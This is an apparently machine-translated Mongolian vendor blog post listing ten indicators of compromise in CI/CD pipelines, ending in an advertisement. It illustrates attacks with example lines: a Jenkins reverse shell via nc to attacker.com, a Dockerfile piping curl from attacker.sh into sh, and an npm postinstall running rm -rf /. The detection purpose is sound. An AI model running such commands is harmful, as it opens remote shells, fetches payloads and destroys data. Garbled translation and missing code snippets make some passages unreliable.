Буулт хийх шилдэг 10 үзүүлэлт CI/CD Pipelines

Оршил: Кибер аюулгүй байдлын буулт хийх шинж тэмдгүүд юу вэ?

Буултын шинж тэмдгүүд нь таны систем эсвэл pipeline халдлагад өртөж болзошгүй. Энгийнээр хэлбэл, буулт хийх үзүүлэлтүүд халдагчдын үлдээсэн ул мөр, хачин юм шиг logins, файлын өөрчлөлт, эсвэл нуугдсан хортой програм хангамж. ОУОХ-ны кибер аюулгүй байдал, тэд гэмт хэргийн газарт хурууны хээ шиг ажилладаг бөгөөд ямар нэгэн зүйл буруу байгааг тодорхой нотлох баримт өгдөг. Тиймээс хөгжүүлэгчид асуухад Бууралцлын шинж тэмдэг юу вэ, хариулт нь зөвхөн сервер эсвэл галт ханагаар хязгаарлагдахгүй, мөн орчин үеийн ертөнцөд нуугдсан эрсдэлүүдийг багтаасан болно. CI/CD pipelines.

Эдгээр нь pipelines, халдагчид кодыг өөрчлөх, хортой хамаарлыг оруулах эсвэл бүтээх алхмуудыг анзаарагдахгүйгээр өөрчлөх боломжтой. Гэсэн хэдий ч ихэнх гарын авлага нь зөвхөн сервер эсвэл сүлжээнд анхаарлаа хандуулсаар байна. Үүний үр дүнд програм хангамжийн хангамжийн сүлжээ хамгийн хялбар байнуудын нэг болсон.

Тийм ч учраас буулт хийх шинж тэмдгүүдийг олох нь CI/CD pipelines нь зайлшгүй шаардлагатай. Юуны өмнө энэ нь багуудад хортой програм хангамжийг хаах, нууцлалыг хамгаалах, програм хангамжийн хүргэлтийн алхам бүрийг аюулгүй байлгахад тусалдаг.

Буулт хийх шилдэг 10 үзүүлэлт CI/CD Pipelines

Буултын үзүүлэлтүүдийг тайлбарлахдаа ихэнх жагсаалтууд нь сервер эсвэл сүлжээнд анхаарлаа хандуулдаг. Гэсэн хэдий ч CI/CD pipelineХалдагчид маш өөр хурууны хээ үлдээдэг. Эдгээр дохиог таних нь урьдчилан сэргийлэх хамгаалалтын хувьд чухал юм. Хөгжүүлэгч болон аюулгүй байдлын инженер бүрийн анхаарах ёстой ОУОХ-ны кибер аюулгүй байдлын 10 улаан тугийг доор харуулав.

1. Сэжигтэй хамаарлын өөрчлөлтүүд

Буулт хийх гол үзүүлэлтүүдийн нэг pipelines нь гэнэтийн, хачин хамаарлын шинэчлэлт юм. Халдагчид ихэвчлэн аюултай багцуудыг нэмэхийн тулд хөгжүүлэгчдийн багц менежерүүдэд байрлуулсан итгэлцлийг ашигладаг.

Жишээлбэл, npm a-д package.json гэнэтийн ялгаа нь дараахь зүйлийг агуулж болно:

Ийм өөрчлөлтүүд аюулгүй харагдаж болох ч троянжуулсан кодыг бүх бүтээн байгуулалтад оруулж болно.

Үр нөлөө: Алдагдсан хувилбарууд нь хортой програмуудыг эх үүсвэрээс нь өвлөн авдаг.

Илрүүлэлт: хамаарлын хяналтыг хэрэгжүүлэх, цоожны файлын ялгааг хянах, шинэ багцуудыг байнга сканнердах.

2. Builds дахь кодын будлиан 

Хортой програм зохиогчид шүүмжийг тойрч гарахын тулд будлиан тарилгад найддаг. Үүний үр дүнд, энэ үзүүлэлт нь буулт хийх CI/CD pipelines нь барихад хамгийн хэцүү байж болох юм. Үнэндээ, ойлгомжгүй ашигтай ачаалал нь ихэвчлэн нээлттэй эхийн сангууд эсвэл контейнерийн дүрс рүү мэдэгдэлгүйгээр ордог.

Жишээлбэл:

  • PyPI багцыг ашиглаж байна base64.b64decode("cHJpbnQoSGFja2VkKQ==").
  • Шаардлагагүй UPX хоёртын файлуудаар дүүрэн Docker дүрс.
  • JavaScript дүүрэн \x41\x42 итгэмжлэл хулгайлагчдыг нуугдаж байгаад зугтдаг.

Үр нөлөө: Нууц код нь бүтээх эсвэл ажиллуулах явцад чимээгүй ажилладаг бөгөөд энэ нь ОУОХ-ны кибер аюулгүй байдлын чухал дохио болдог.
Илрүүлэлт: Хосолсон SAST кодлогдсон эсвэл багцлагдсан кодыг тэмдэглэхийн тулд хортой програм хангамжийг сканнердах замаар. Юуны өмнө, ойлгомжгүй байдлыг цаашид судлах шаардлагатай аюулын дохио гэж үз.

3. Git-д ил болсон нууцууд: IOC-ийн сонгодог кибер аюулгүй байдлын эрсдэл

CI/CD pipelines нь ихэвчлэн нууцыг сангаас шууд өвлөн авдаг. Гэсэн хэдий ч, Git дээр нууцууд гарч ирэх үед, тэдгээр нь "буулт хийх шинж тэмдэг юу вэ" гэсэн асуултын хамгийн тодорхой хариултуудын нэг болж байна. pipeline"с?" Git-д итгэмжлэлүүд буусны дараа халдагчид тэдгээрийг тодорхойгүй хугацаагаар ашиглаж болно.

Жишээлбэл:

  • A .env агуулсан файл AWS_SECRET_KEY=.
  • Токенуудыг оруулав config.json.
  • Устгасны дараа ч Git-ийн түүхэнд нууцууд харагдсаар байна.

Үр нөлөө: Ил гарсан түлхүүрүүд нь халдагчид шууд хандах боломжийг олгодог CI/CD pipelineс, үүлэн систем эсвэл мэдээллийн сан. Тиймээс энэ нь буулт хийх хамгийн аюултай үзүүлэлтүүдийн нэг юм.
Илрүүлэлт: ашиглах pre-commit hooks мөн нууц сканнердахын тулд CI ажлуудыг хийж, алдагдсан түлхүүрүүдийг нэн даруй цуцлах. Түүнчлэн, өртөлтийн цонхыг багасгахын тулд автоматжуулсан засварыг хэрэгжүүлнэ.

4. Хуурамчаар засварласан Pipeline Тохиргоо: Буултын далд үзүүлэлтүүд

Pipeline тохиргоонууд нь өндөр үнэ цэнэтэй зорилтууд юм, учир нь ганц өөрчлөлт нь ажлын урсгалыг бүхэлд нь булаан эзэлдэгҮүний үр дүнд, өөрчлөгдсөн pipeline файлууд нь уламжлалт хяналтын хэрэгслүүд ховор илрүүлдэг ОУОХ-ны кибер аюулгүй байдлын томоохон эрсдэл юм.

Жишээлбэл:

  • GitHub үйлдлүүдэд:

  • GitLab дээр: хортой ажил нэмэгдсэн .gitlab-ci.yml энэ нь мэдрэмтгий өгөгдлийг хаядаг.
  • Женкинс дээр: sh "nc -e /bin/bash attacker.com 4444".

Үр нөлөө: Эдгээр батлагдаагүй өөрчлөлтүүд таных болно pipeline халдагчдын хувьд байнгын арын хаалга болж хувирдаг бөгөөд энэ нь буулт хийсний илрэл гэж тооцогддог.
Илрүүлэлт: Гарын үсэг зурсан тохиргоог хэрэгжүүлэх, PR-ийн зөвшөөрөл шаардах, гэнэтийн ажлуудыг хянах. Үүнээс гадна, тохируулах guardrails өөрчлөгдсөн ажлын урсгалыг автоматаар хаах.

5. Давуу эрхтэй IaC Үндсэн утга 

Буруу тохируулсан дэд бүтцийн тодорхойлолтууд нь ихэвчлэн далд арын хаалга үүсгэдэг. Үүний үр дүнд давуу эрхтэй анхдагч тохиргоонууд IaC нь ОУОХ-ны кибер аюулгүй байдлын сонгодог эрсдэл юм.

Жишээлбэл:

  • Kubernetes байршуулалтын зөвшөөрөл олгох подууд privileged: true.
  • Үйлчилгээг харуулсан Helm charts 0.0.0.0:22.

Үр нөлөө: Халдагчид үндсэн түвшний хандалт авах эсвэл дотоод үйлчилгээг олон нийтэд ил болгодог. Үүний үр дүнд эдгээр асуудлууд нь халдлагын гадаргууг мэдэгдэхүйц өргөжүүлдэг.
Илрүүлэлт: түрхэнэ IaC нэгтгэхээс өмнө хамгийн бага эрхийг хэрэгжүүлэхийн тулд сканнердах. Нэмж дурдахад, тохиргоо бүрийг нэг хэсэг болгон хянаж байгаа эсэхийг шалгаарай pipeline.

6. Ер бусын биеийн зан төлөв 

Довтлогчид ихэвчлэн өөрчлөгддөг pipeline хорлонтой үйлдэлд гулсах зан байдал. Өөрөөр хэлбэл, ер бусын бүтээх үйл ажиллагаа нь буулт хийх шинж тэмдгүүд юу болох талаар хамгийн тодорхой хариултуудын нэг юм. CI/CD pipelines.

Жишээлбэл:

  • Хачин домэйнууд руу гадагш чиглэсэн сүлжээний хүсэлт гаргах бүтээгдхүүнүүд.
  • Node.js төсөл гэнэт PowerShell-ийг үүсгэсэн npm install.
  • CI ажил нь бүтээх скриптүүдэд тодорхойлогдоогүй том хоёртын файлуудыг татаж байна.

Үр нөлөө: Гэмтсэн хувилбарууд нь хортой програм хангамжийн тархалтын цэг болж чаддаг. Хамгийн гол нь тэд байршуулалт бүрт хортой ачааллыг тараадаг.
Илрүүлэлт: Гэнэтийн процессууд эсвэл холболтуудын хувьд бүтээх бүртгэлийг хянах. Цаашилбал, хэвийн бус зан үйлийг тэмдэглэхийн тулд гажиг илрүүлэх тохиргоог хийх.

7. Хортой багцын скриптүүд нь ОУОХ-ны кибер аюулгүй байдлын эрсдэл юм

Багц менежерүүд амьдралын мөчлөгийг дэмждэг hooks халдагчид үүнийг ашигладаг. Тиймээс npm, PyPI, эсвэл Dockerfile дахь хортой скриптүүд нь халдлагын хүчтэй үзүүлэлт юм.

Жишээлбэл:

  • npm: postinstall скрипт ажиллаж байна rm -rf / эсвэл C2 руу дохио өгөх.
  • PyPI: setup.py Суулгах үед далд Python кодыг ажиллуулах.
  • Докерфайл: RUN curl attacker.sh | sh.

Үр нөлөө: Халдлага нь ямар ч ажиллах үеийн туршилтаас өмнө суулгалтын явцад хийгддэг. Үүний үр дүнд хөгжүүлэгчид хэтэрхий оройтох хүртэл анзаарахгүй байж магадгүй юм.
Илрүүлэлт: Суулгах скриптүүдийн багцын манифестийг сканнердах. Үүнээс гадна, эрсдэлтэй зүйлсийг хязгаарлах hooks in CI/CD өртөлтийг бууруулах ажлын байрууд.

8. Бүртгэлийн хордлогын үзүүлэлтүүд нь буулт хийх чадваргүй байдлын шинж тэмдэг юм

Халдагчид бүртгэл дэх эд өлгийн зүйлсийг сольж эсвэл өөрчилдөг бөгөөд эдгээр үйл явдлууд нь хангамжийн сүлжээнд буулт хийж байгаагийн шинж тэмдгүүдийн сурах бичгийн жишээ юм. pipelines.

Жишээлбэл:

  • Docker зургийн шошгыг троянжуулсан давхаргаар чимээгүйхэн шинэчилсэн.
  • Дотоод багцыг хортой хувилбараар сольсон.
  • npm нэрийн орон зайг шахах, жишээ нь lodash-proxy.

Үр нөлөө: Бүртгэлийн артефактыг ашигласан бүтээн байгуулалт бүр эвдэгддэг. Түүнээс гадна, энэ эвдэн байгуулалт нь дараагийн үйлчилгээнд ч тархдаг.
Илрүүлэлт: Бүх бүртгэлийн таталтууд дээр гарын үсэг болон бүрэн бүтэн байдлын шалгалтыг хэрэгжүүлнэ. Үүнээс гадна, олдворын гарал үүслийг хянах SBOM баталгаажуулалт

9. ОУОХ-ны нотлох баримт болгон хэрэглэгчийн хэвийн бус үйл ажиллагаа

Алдагдсан дансууд бараг үргэлж хэвийн бус ул мөр үлдээдэг. Үүний дагуу хөгжүүлэгчийн ер бусын зан байдал нь буулт хийх хүчтэй үзүүлэлт юм.

Жишээлбэл:

  • Commitорон нутгийн цагаар үүрийн 3 цагт дуугарчээ.
  • Амралтаараа байгаа дансуудын PR зөвшөөрөл.
  • Pipelines нь ер бусын давтамжтайгаар өдөөгддөг.

Үр нөлөө: Халдагчид хулгайлагдсан мэдээллийг ашиглан хортой өөрчлөлтүүдийг оруулдаг. Эцсийн эцэст зөвшөөрөлгүй commitердийн ажлын урсгалд амархан уусдаг.
Илрүүлэлт: Хяналт SCM гажигтай холбоотой үйл ажиллагаа явуулах, MFA-г хэрэгжүүлэх, токенуудыг тогтмол эргүүлэх. Үүнээс гадна, сэжигтэй үед анхааруулга өгөх commit эсвэл батлах загварууд.

10. ОУОХ-ны кибер аюулгүй байдлын шалгалтад бүрэн бүтэн байдал эсвэл гарын үсгийн шалгалт амжилтгүй болсон

Нийтлэг боловч үл тоомсорлогдсон зүйл буулт хийх үзүүлэлт бүрэн бүтэн байдал эсвэл гарын үсгийн шалгалт амжилтгүй болсон. ОУОХ-ны кибер аюулгүй байдалд эдгээр шалгалтууд нь код эсвэл эд өлгийн зүйлс жинхэнэ эсэхийг баталгаажуулдаг. Тэдгээрийг алгасах нь үлдэнэ. pipelineил гарсан.

жишээ нь:

  • SHA256 хэш нь хүлээгдэж буй шалгах нийлбэртэй таарахгүй байна.
  • GPG гарын үсэг байхгүй эсвэл хүчингүй байна.
  • An SBOM гарын үсэггүй эд өлгийн зүйлсийг харуулж байна.

Үр нөлөө: Бүрэн бүтэн байдлын алдаа нь ихэвчлэн өөрчлөлт оруулах, бүртгэлийн хордлого хийх эсвэл хортой програм хангамж оруулах гэсэн үг юм.

Илрүүлэлт: Гарын үсгийн шалгалтыг автоматжуулж, чекийн нийлбэрийн баталгаажуулалтыг хэрэгжүүлж, гарын үсэг зураагүй бүрэлдэхүүн хэсгүүдийг хаах. Хамгийн гол нь амжилтгүй шалгалт бүрийг алдааны тодорхой нотолгоо гэж үзэх.

CI/CD Товчхондоо буулт хийх үзүүлэлтүүд

Буулт хийх үзүүлэлт (IOC) Нөлөөллийн CI/CD Pipelines Хэрхэн илрүүлэх вэ
Сэжигтэй хамаарлын өөрчлөлтүүд Халдагчид хортой сангуудыг багц менежерүүдэд оруулдаг бөгөөд энэ нь эвдэрсэн бүтээн байгуулалтуудад хүргэдэг. Түгжих файлын ялгааг хянах, хамаарлын хяналтыг хэрэгжүүлэх, хамаарлуудыг тасралтгүй сканнердах.
Builds дахь ойлгомжгүй код Нууцлагдсан ачаалал нь бүтээх эсвэл ажиллах үед илрүүлэлгүйгээр ажилладаг. ашиглах SAST болон base64, hex эсвэл packed кодын хэв маягийг тэмдэглэхийн тулд хортой програм хангамжийг сканнердах.
Git дээр ил болсон нууцууд Алдагдсан токен эсвэл API түлхүүрүүд нь халдагчид чухал системд шууд хандах боломжийг олгодог. Git дээр нууц сканнердах ажиллагааг ажиллуулах hooks алдагдсан итгэмжлэлүүдийг автоматаар хүчингүй болгох.
Хуурамчаар засварласан Pipeline Тохиргоо Өөрчлөгдсөн ажлын урсгалууд нь өгөгдлийг гадагшлуулах эсвэл дотор нь хадгалах боломжийг олгодог CI/CD. Олон нийттэй харилцах албаны зөвшөөрөл шаардах, гарын үсэг зурсан тохиргоог хэрэгжүүлэх, хянах pipeline өөрчлөлтүүд.
Хувьчлагдсан IaC Үндсэн утга Хэт их зөвшөөрөгдсөн үүрэг эсвэл аюулгүй бус анхдагч тохиргоо нь үүлэн орчныг ил гаргадаг. Хамгийн бага эрхийн хэрэгжилтийг хангахын тулд Terraform, Kubernetes, болон Helm файлуудыг сканнердах.
Ер бусын бие бялдрын зан үйл Pipelineхортой програм хангамжийн тархалтын цэг эсвэл хажуугийн хөдөлгөөнд ашиглагддаг. Гэнэтийн татан авалт, процесс эсвэл гадагш чиглэсэн дуудлагын талаар бүтээх бүртгэлийг шинжил.
Хортой багцын скриптүүд Суулгахаас өмнөх/дараагийн нууцлагдсан скриптүүд нь ажиллах үеийн туршилтаас өмнө ачааллыг идэвхжүүлдэг. Эрсдэлтэй npm/PyPI скриптүүдийг хааж, гүйцэтгэлийг хязгаарлах CI/CD ажлын байр.
Бүртгэлийн хордлого Троянжсан эд өлгийн зүйлс нь бүртгэл дэх итгэмжлэгдсэн зураг эсвэл хоёртын файлуудыг орлодог. Чекийн дүнг баталгаажуулж, гарын үсгийн баталгаажуулалтыг хэрэгжүүлж, бүртгэлийг урьдчилан сканнердах.
Хэрэглэгчийн хэвийн бус үйл ажиллагаа Алдагдсан бүртгэлүүд хортой зүйлсийг түлхэж байна commits эсвэл гох pipelines. MFA-г хэрэгжүүлэх, хянах commitаномалиудын хувьд s, мөн дүн шинжилгээ хийх login хэв маяг.
Бүрэн бүтэн байдал эсвэл гарын үсгийн шалгалт амжилтгүй болсон Хуурамч код, хамаарал эсвэл зургууд орж ирж байгааг заана pipeline. Бүрэн бүтэн байдлын шалгалтыг автоматжуулж, гарын үсэг зураагүй эсвэл тохиромжгүй бүрэлдэхүүн хэсгүүдийг хаах.

ОУОХ-ны уламжлалт кибер аюулгүй байдал яагаад алдагдаж байна вэ CI/CD эрсдэл

Ихэнх байгууллагууд сервер, компьютер эсвэл сүлжээнд халдлагын шинж тэмдгүүдийг аль хэдийн хянаж байдаг. Гэсэн хэдий ч ОУОХ-ны кибер аюулгүй байдлын энэхүү сонгодог арга барилыг үл тоомсорлодог. CI/CD pipelines нь одоо хамгийн чухал довтолгооны гадаргуугийн нэг болсон. Үнэндээ, pipelines нь уламжлалт хэрэгслүүд илрүүлж чадахгүй өвөрмөц буулт дохиог харуулдаг.

Уламжлалт аюулгүй байдлын буулт хийх үзүүлэлтүүд

Уламжлалт ОУОХ-ны кибер аюулгүй байдлын хувьд гол анхаарал нь ихэвчлэн дараахь зүйлд төвлөрдөг.

  • Хэвийн бус logins эсвэл хулгайлагдсан мэдээлэл агуулсан IP хаягууд.
  • Хортой програм хангамж илэрсэн сэжигтэй файлын хэш эсвэл бүртгэлийн өөрчлөлтүүд.
  • Өгөгдөл гадагшлах урсгалыг зааж буй гэнэтийн гадагш урсгал.

Эдгээр нь мөн хянаж буй сайн мэддэг үзүүлэлтүүд юм MITER ATT&CK хүрээ, нь нийтлэг дайсан зан байдал, тактикийг харуулдаг. Эдгээр нь ашигтай дохионууд юм. Гэсэн хэдий ч тэдгээр нь голчлон үйлдлийн систем эсвэл корпорацийн сүлжээнд хамаарна. Үүний үр дүнд тэд програм хангамжийн хангамжийн сүлжээнд эрт үед тохиолддог нарийн өөрчлөлтийг анзаардаггүй.

яагаад CI/CD Pipelines ялгаатай

CI/CD pipelines нь хөгжүүлэгчид байдаг автоматжуулсан орчин юм commit код, татах хамаарлууд болон чөлөөлөх хувилбарууд. Халдагчид энд нэг буулт нь байршуулалт бүрт тохиолддог гэдгийг мэддэг. Үүний дагуу, буулт хийх үзүүлэлтүүд юу вэ? CI/CD pipelineТэд маш өөр харагдаж байна:

  • package.json эсвэл requirements.txt файлд хорлонтой хамаарал чимээгүй нэмэгдсэн.
  • Git дээр ил гарсан API түлхүүрүүд эсвэл токенууд commits эсвэл .env файлууд.
  • npm эсвэл PyPI багцуудад оруулсан ойлгомжгүй код.
  • Terraform эсвэл Kubernetes файлууд нь privilegy: true гэх мэт аюулгүй бус анхдагч тохиргоотой байдаг.
  • Pipeline өгөгдлийг шүүж гаргах эсвэл арын хаалгыг нээх зорилгоор засварласан ажлууд.

Эдгээр буулт хийх дохионууд CI/CD үл үзэгдэх хэвээр байх standard аюулгүй байдлын хэрэгслүүд.

ОУОХ-ны кибер аюулгүй байдлын зөрүү

Хэдийгээр олон багууд буулт хийх үзүүлэлтүүдийн үнэ цэнийг ойлгодог ч зөвхөн сервер болон сүлжээний бүртгэлээс илрүүлэхэд л найддаг. Тиймээс халдагчид ердийн ул мөр үлдээхгүйгээр бүтээн байгуулалтыг хордуулах эсвэл хортой програм хангамж оруулах боломжтой. Ийм учраас XZ Utils арын хаалга эсвэл хортой npm багцууд зэрэг үйл явдлууд үйлдвэрлэлд хүрэх хүртэл илрүүлэгдээгүй байдаг.

Нийлүүлэлтийн сүлжээний иймэрхүү зөрчлүүдийг мөн онцолсон болно CISА-ийн хангамжийн сүлжээний аюулгүй байдлын удирдамжхалдагчид улам бүр ихээр зорилтот болгож байгааг анхааруулж байна CI/CD pipelineболон бүртгэлүүд.

Takeaway

Уламжлалт ОУОХ-ны кибер аюулгүй байдал зайлшгүй шаардлагатай боловч хангалтгүй. Юуны өмнө багууд тодорхой буулт хийх шинж тэмдгүүдийг хүлээн зөвшөөрөх ёстой. CI/CD pipelineзөвхөн дараа нь тэд хортой кодыг илрүүлж чадна эсвэл pipeline хүрээлэн буй орчинд тархахаас нь өмнө хүчирхийлэл үйлдэх.

sca-tools-програм хангамжийн-бүтцийн-шинжилгээний-хэрэгсэл
Програм хангамжийн эрсдэлээ эрэмбэлэх, засах, аюулгүй болгох
Үнэгүй бүртгэлээ аваарай.
Зээлийн картын шаардлагагүй.

Програм хангамжийн хөгжүүлэлт болон хүргэлтээ аюулгүй байлгаарай

Xygeni Product Suite-тэй хамт